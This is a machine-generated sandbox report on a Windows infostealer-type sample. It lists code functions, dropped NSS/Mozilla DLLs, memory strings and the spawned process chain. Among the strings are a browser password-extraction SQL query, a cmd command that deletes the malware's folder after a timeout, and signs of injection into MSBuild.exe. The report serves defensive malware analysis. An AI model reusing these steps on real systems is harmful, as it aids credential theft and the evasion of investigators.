Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_1FE38763	6_2_1FE38763
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_1FE74760	6_2_1FE74760
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_1FEA8760	6_2_1FEA8760
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_1FE38680	6_2_1FE38680
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_1FF50480	6_2_1FF50480
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_1FE13AB2	6_2_1FE13AB2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_1FE98120	6_2_1FE98120
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_1FE90090	6_2_1FE90090
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_1FF38030	6_2_1FF38030
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_1FE1290A	6_2_1FE1290A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_1FE3BAB0	6_2_1FE3BAB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_1FE1251D	6_2_1FE1251D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_1FE43370	6_2_1FE43370
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_1FE1F160	6_2_1FE1F160
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_1FE1174E	6_2_1FE1174E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_1FE72EE0	6_2_1FE72EE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_1FFEAEBE	6_2_1FFEAEBE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_1FE56E80	6_2_1FE56E80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_1FE119DD	6_2_1FE119DD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_1FE13580	6_2_1FE13580
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_1FE1EA80	6_2_1FE1EA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_1FE1AA40	6_2_1FE1AA40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_1FEF69C0	6_2_1FEF69C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_1FF0A940	6_2_1FF0A940
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_1FF2A900	6_2_1FF2A900
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_1FE1481D	6_2_1FE1481D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_1FF4E800	6_2_1FF4E800
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_1FE266C0	6_2_1FE266C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_1FE12018	6_2_1FE12018
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_1FF0A590	6_2_1FF0A590
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_1FE3A560	6_2_1FE3A560
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_1FE147AF	6_2_1FE147AF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_1FE9A0B0	6_2_1FE9A0B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_1FE1209F	6_2_1FE1209F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_1FE12AA9	6_2_1FE12AA9

Dropped file seen in connection with other malware

Source: Joe Sandbox View	Dropped File: C:\ProgramData\freebl3.dll EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
Source: Joe Sandbox View	Dropped File: C:\ProgramData\mozglue.dll BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A

Found potential string decryption / allocating functions

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: String function: 1FE11C2B appears 47 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: String function: 1FE1395E appears 78 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: String function: 1FE13AF3 appears 37 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: String function: 1FE11F5A appears 31 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: String function: 1FE1415B appears 133 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: String function: 1FFF06B1 appears 36 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: String function: 00402000 appears 287 times
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Code function: String function: 6C4C09D0 appears 57 times
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Code function: String function: 6C2D94D0 appears 90 times
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Code function: String function: 003D2000 appears 287 times
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Code function: String function: 6C2CCBE8 appears 134 times

Sample file is different than original file name gathered from version info

Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2188073732.00000000358C9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamemozglue.dll0 vs a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2191144720.000000003B838000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamemsvcp140.dll^ vs a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2193997292.00000000417A2000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamesoftokn3.dll0 vs a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2207383675.000000006C515000.00000002.00000001.01000000.00000007.sdmp	Binary or memory string: OriginalFilenamenss3.dll0 vs a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2200231222.000000004D676000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamenss3.dll0 vs a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2197298605.0000000047710000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamevcruntime140.dll^ vs a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2206892942.000000006C322000.00000002.00000001.01000000.00000008.sdmp	Binary or memory string: OriginalFilenamemozglue.dll0 vs a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2185251178.000000002F952000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamefreebl3.dll0 vs a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe

Uses 32bit PE files

Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 4.2.EHDHIDAEHC.exe.2ed93c8.1.raw.unpack, fDX9tehJ5EFemhKZwc.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 4.2.EHDHIDAEHC.exe.2ed93c8.1.raw.unpack, fDX9tehJ5EFemhKZwc.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 4.2.EHDHIDAEHC.exe.53b0000.13.raw.unpack, fDX9tehJ5EFemhKZwc.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 4.2.EHDHIDAEHC.exe.53b0000.13.raw.unpack, fDX9tehJ5EFemhKZwc.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 4.2.EHDHIDAEHC.exe.2ec49a0.0.raw.unpack, fDX9tehJ5EFemhKZwc.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 4.2.EHDHIDAEHC.exe.2ec49a0.0.raw.unpack, fDX9tehJ5EFemhKZwc.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 4.2.EHDHIDAEHC.exe.40d0dd0.11.raw.unpack, RnDmD.cs	Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@12/24@3/4

Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe

Code function: 0_2_6C2F7030 GetLastError,FormatMessageA,__acrt_iob_func,__acrt_iob_func,__acrt_iob_func,fflush,LocalFree,

0_2_6C2F7030

Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe

Code function: 0_2_003E1400 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,FindCloseChangeNotification,

0_2_003E1400

Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe

Code function: 0_2_003E0900 CoInitializeEx,CoInitializeSecurity,CoCreateInstance,CoSetProxyBlanket,VariantInit,VariantClear,

0_2_003E0900

Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\76561199747278259[1].htm

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2840:120:WilError_03
Source: C:\ProgramData\EHDHIDAEHC.exe	Mutant created: NULL

Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2193997292.00000000417A2000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.0.dr	Binary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2181684903.0000000025178000.00000002.00001000.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2200231222.000000004D676000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2207204540.000000006C4CF000.00000002.00000001.01000000.00000007.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2181945016.00000000276BB000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2356461481.0000000020028000.00000002.00001000.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2349842336.000000001A0B7000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.0.dr	Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2193997292.00000000417A2000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.0.dr	Binary or memory string: SELECT ALL * FROM %s LIMIT 0;
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2181684903.0000000025178000.00000002.00001000.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2200231222.000000004D676000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2207204540.000000006C4CF000.00000002.00000001.01000000.00000007.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2181945016.00000000276BB000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2356461481.0000000020028000.00000002.00001000.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2349842336.000000001A0B7000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.0.dr	Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2181684903.0000000025178000.00000002.00001000.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2200231222.000000004D676000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2207204540.000000006C4CF000.00000002.00000001.01000000.00000007.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2181945016.00000000276BB000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, MSBuild.exe, 00000006.00000002.2356461481.0000000020028000.00000002.00001000.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2349842336.000000001A0B7000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.0.dr	Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2193997292.00000000417A2000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.0.dr	Binary or memory string: UPDATE %s SET %s WHERE id=$ID;
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2181684903.0000000025178000.00000002.00001000.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2200231222.000000004D676000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2207204540.000000006C4CF000.00000002.00000001.01000000.00000007.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2181945016.00000000276BB000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2356461481.0000000020028000.00000002.00001000.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2349842336.000000001A0B7000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.0.dr	Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2193997292.00000000417A2000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.0.dr	Binary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2181684903.0000000025178000.00000002.00001000.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2181945016.00000000276BB000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, MSBuild.exe, 00000006.00000002.2356461481.0000000020028000.00000002.00001000.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2349842336.000000001A0B7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: INSERT INTO "%w"."%w"("%w") VALUES('integrity-check');
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2193997292.00000000417A2000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.0.dr	Binary or memory string: SELECT ALL id FROM %s WHERE %s;
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2193997292.00000000417A2000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.0.dr	Binary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2181684903.0000000025178000.00000002.00001000.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2181945016.00000000276BB000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2356461481.0000000020028000.00000002.00001000.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2349842336.000000001A0B7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE IF NOT EXISTS %s.'rbu_tmp_%q' AS SELECT *%s FROM '%q' WHERE 0;
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2193997292.00000000417A2000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.0.dr	Binary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
Source: MSBuild.exe, 00000006.00000002.2344932078.00000000012C8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SELECT origin_url, username_value, password_value FROM logins;
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2181684903.0000000025178000.00000002.00001000.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2200231222.000000004D676000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2207204540.000000006C4CF000.00000002.00000001.01000000.00000007.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2181945016.00000000276BB000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2356461481.0000000020028000.00000002.00001000.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2349842336.000000001A0B7000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.0.dr	Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2181684903.0000000025178000.00000002.00001000.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2200231222.000000004D676000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2207204540.000000006C4CF000.00000002.00000001.01000000.00000007.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2181945016.00000000276BB000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2356461481.0000000020028000.00000002.00001000.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2349842336.000000001A0B7000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.0.dr	Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2193997292.00000000417A2000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.0.dr	Binary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2181684903.0000000025178000.00000002.00001000.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2181945016.00000000276BB000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2356461481.0000000020028000.00000002.00001000.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2349842336.000000001A0B7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,nexec INT,ncycle INT,stmt HIDDEN);
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1864080722.0000000003305000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1864176505.000000000331C000.00000004.00000020.00020000.00000000.sdmp, ECFHJK.0.dr	Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2193997292.00000000417A2000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.0.dr	Binary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %sD
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2181684903.0000000025178000.00000002.00001000.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2181945016.00000000276BB000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, MSBuild.exe, 00000006.00000002.2356461481.0000000020028000.00000002.00001000.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2349842336.000000001A0B7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2181684903.0000000025178000.00000002.00001000.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2181945016.00000000276BB000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2356461481.0000000020028000.00000002.00001000.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2349842336.000000001A0B7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2193997292.00000000417A2000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.0.dr	Binary or memory string: SELECT DISTINCT %s FROM %s where id=$ID LIMIT 1;

Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe

Virustotal: Detection: 60%

Source: unknown	Process created: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe "C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe"
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Process created: C:\ProgramData\EHDHIDAEHC.exe "C:\ProgramData\EHDHIDAEHC.exe"
Source: C:\ProgramData\EHDHIDAEHC.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
Source: C:\ProgramData\EHDHIDAEHC.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\BFCAAEHJDBKJ" & exit
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 10
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Process created: C:\ProgramData\EHDHIDAEHC.exe "C:\ProgramData\EHDHIDAEHC.exe"	Jump to behavior
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\BFCAAEHJDBKJ" & exit	Jump to behavior
Source: C:\ProgramData\EHDHIDAEHC.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"	Jump to behavior
